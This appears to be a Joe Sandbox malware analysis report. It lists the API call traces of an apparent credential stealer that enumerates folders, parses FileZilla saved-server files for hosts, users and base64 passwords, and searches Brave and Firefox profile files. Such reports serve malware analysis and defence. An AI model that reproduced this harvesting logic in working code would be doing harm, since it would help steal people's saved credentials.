                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2036
                          • lstrlen.KERNEL32(00801794), ref: 007E2048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2067
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E2073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2098
                          • lstrlen.KERNEL32(?), ref: 007E20AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E20D0
                          • lstrcat.KERNEL32(00000000,?), ref: 007E20DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2103
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E213F
                          • lstrlen.KERNEL32(0125D580), ref: 007E214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E2181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 4cfbba851ff4d110a4485f9dece853c60c8c96ebdd0e8f042621126756d90196
                          • Instruction ID: d9a9bb497868bd3c7037e892fbac739f1b21142aa9739badd915d331a107156a
                          • Opcode Fuzzy Hash: 4cfbba851ff4d110a4485f9dece853c60c8c96ebdd0e8f042621126756d90196
                          • Instruction Fuzzy Hash: B4626F31A1265A9BCB21EFA5CC4DAAF77B9AF58700F444125B805E7252DB3CDD07CBA0
                          APIs
                          • wsprintfA.USER32 ref: 007E392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 007E3943
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E396C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E3986
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E39BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E39E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E39F2
                          • lstrlen.KERNEL32(00801794), ref: 007E39FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3A1A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3A26
                          • lstrlen.KERNEL32(?), ref: 007E3A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3A53
                          • lstrcat.KERNEL32(00000000,?), ref: 007E3A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3A8A
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E3ACE
                          • lstrlen.KERNEL32(?), ref: 007E3AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B36
                          • lstrlen.KERNEL32(00801794), ref: 007E3B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B6A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B9E
                          • lstrlen.KERNEL32(?), ref: 007E3BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 007E3BE0
                          • lstrlen.KERNEL32(01259298), ref: 007E3C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3C3C
                          • lstrlen.KERNEL32(01259148), ref: 007E3C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3CB7
                          • lstrlen.KERNEL32(00801794), ref: 007E3CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3CE8
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3D79
                          • lstrlen.KERNEL32(00801794), ref: 007E3D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3DAD
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3E43
                          • lstrlen.KERNEL32(00801794), ref: 007E3E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3E77
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3F0D
                          • lstrlen.KERNEL32(00801794), ref: 007E3F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3F41
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3F75
                          • lstrlen.KERNEL32(?), ref: 007E3F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 007E3FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3FE0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E401F
                          • lstrlen.KERNEL32(0125D580), ref: 007E402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E40CE
                          • lstrcat.KERNEL32(00000000), ref: 007E40DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007E42D9
                          • FindClose.KERNEL32(00000000), ref: 007E42E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 07f2d274eaaa0629ab151b67303cd97315b8758444fa14a8fe88ff7fe1ab389c
                          • Instruction ID: 85f373580350ecdaf103b3b5f5a0f1b8b8caee3872a2a775df12a4cd6ec947b3
                          • Opcode Fuzzy Hash: 07f2d274eaaa0629ab151b67303cd97315b8758444fa14a8fe88ff7fe1ab389c
                          • Instruction Fuzzy Hash: 0A62747191265ADBCB21EFA5DC4DAAE77B9AF58300F048125F815A7252DB3CED03CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007E69C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E6A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 007E6A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 007E6AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007E6B35
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6B9D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 631db039cbc10e1fac4381edbdfb726a74873bc905f473dffbd4711aec522f61
                          • Instruction ID: 7d40c2aa9da09ecffde0a6c3a00ed3a4dc6c17f9dc02ed22b708a88670e107d5
                          • Opcode Fuzzy Hash: 631db039cbc10e1fac4381edbdfb726a74873bc905f473dffbd4711aec522f61
                          • Instruction Fuzzy Hash: 0642B071A0225AABDB11EBB5CC49A6F77B9EF68740F049415F901E7252DB3CD903CB60
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDBEF
                          • lstrlen.KERNEL32(00804CA8), ref: 007DDBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC17
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007DDC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC4C
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDC8F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007DDCD0
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007DDCF0
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007DDD0A
                          • lstrlen.KERNEL32(007FCFEC), ref: 007DDD1D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDD7B
                          • lstrlen.KERNEL32(00801794), ref: 007DDD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDA3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDDAF
                          • lstrlen.KERNEL32(?), ref: 007DDDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 007DDDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDE19
                          • lstrlen.KERNEL32(00801794), ref: 007DDE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDE6F
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDE7B
                          • lstrlen.KERNEL32(01258F98), ref: 007DDE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDEBB
                          • lstrlen.KERNEL32(00801794), ref: 007DDEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDEE6
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDEF2
                          • lstrlen.KERNEL32(01259138), ref: 007DDF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFA5
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDFB1
                          • lstrlen.KERNEL32(01258F98), ref: 007DDFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDFF4
                          • lstrlen.KERNEL32(00801794), ref: 007DDFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE022
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DE02E
                          • lstrlen.KERNEL32(01259138), ref: 007DE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 007DE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 007DE0E7
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE11F
                          • lstrlen.KERNEL32(0125D580), ref: 007DE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE155
                          • lstrcat.KERNEL32(00000000,?), ref: 007DE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE19F
                          • lstrcat.KERNEL32(00000000), ref: 007DE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007DE1F9
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE22F
                          • lstrlen.KERNEL32(01259298), ref: 007DE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE261
                          • lstrcat.KERNEL32(00000000,01259298), ref: 007DE269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007DE988
                          • FindClose.KERNEL32(00000000), ref: 007DE997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 5b2d496b669505581981e8de9fa0bb3ad4366bfb2db221acebcff37d926d4b36
                          • Instruction ID: ece2038b86d7063c8bf3589bb5f94bd4b9d22c27b440ad931792f509e25a53aa
                          • Opcode Fuzzy Hash: 5b2d496b669505581981e8de9fa0bb3ad4366bfb2db221acebcff37d926d4b36
                          • Instruction Fuzzy Hash: 78524271A1121ADBDB21EFB4DD89AAE77B9AF54300F044526F845E7352DB38EC078B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D60FF
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6152
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6185
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D61B5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D61F0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007D6233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 1f13d7abb3532fa044c4a06b1305004e34f2a12d21723fa7cd479fa12808202c
                          • Instruction ID: 946a3608e4a814e13389885c7289a5f3c917e4d939dcf536022ceaee930737dc
                          • Opcode Fuzzy Hash: 1f13d7abb3532fa044c4a06b1305004e34f2a12d21723fa7cd479fa12808202c
                          • Instruction Fuzzy Hash: 35522A71A1021A9BDB21EFA4DC49BAE77B9AF54300F148526F945E7352DB38ED03CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6B9D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6BCD
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6BFD
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 007E6C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007E6C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 007E6C5A
                          • lstrlen.KERNEL32(00000000), ref: 007E6C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 007E6CE2
                          • lstrlen.KERNEL32(00000000), ref: 007E6CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 007E6D6A
                          • lstrlen.KERNEL32(00000000), ref: 007E6D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007E6DF2
                          • lstrlen.KERNEL32(00000000), ref: 007E6E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E6E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 007E6EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 007E6EC9
                          • LocalFree.KERNEL32(00000000), ref: 007E6ED4
                          • lstrlen.KERNEL32(?), ref: 007E6F6E
                          • lstrlen.KERNEL32(?), ref: 007E6F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: a70f3733c27390a32d1526070685d0d5b5edbe0fa41cff28d36cb38d6734434f
                          • Instruction ID: ea0b6c494cba2c566103cec3ef7110e0879623f5813683d79fba318c0b5d71a3
                          • Opcode Fuzzy Hash: a70f3733c27390a32d1526070685d0d5b5edbe0fa41cff28d36cb38d6734434f
                          • Instruction Fuzzy Hash: 6C02BB71A1225AABCB11EBB1CC4DA6F7BB9EF58740F149415F802E7252DB3CD8038B60
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4B7F
                          • lstrlen.KERNEL32(00804CA8), ref: 007E4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BA7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E4BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: cacb6fd275dc6123b8b6d6fc20842203a8047c1514bf5ffe47d54b8937d3799d
                          • Instruction ID: 478ad8d7bbf0d94e32999bb5dd078b36687af06e503da458cde3199303855b60
                          • Opcode Fuzzy Hash: cacb6fd275dc6123b8b6d6fc20842203a8047c1514bf5ffe47d54b8937d3799d
                          • Instruction Fuzzy Hash: 04924170A026498FDB54CF6AC948B5AB7F5AF48718F19816DE809DB3A2D739DC43CB40
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E12BF
                          • lstrlen.KERNEL32(00804CA8), ref: 007E12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12E7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E133A
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E135C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E1376
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E13E2
                          • lstrlen.KERNEL32(00801794), ref: 007E13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E140A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1416
                          • lstrlen.KERNEL32(?), ref: 007E1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1443
                          • lstrcat.KERNEL32(00000000,?), ref: 007E1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E147A
                          • StrCmpCA.SHLWAPI(?,0125D598), ref: 007E14A3
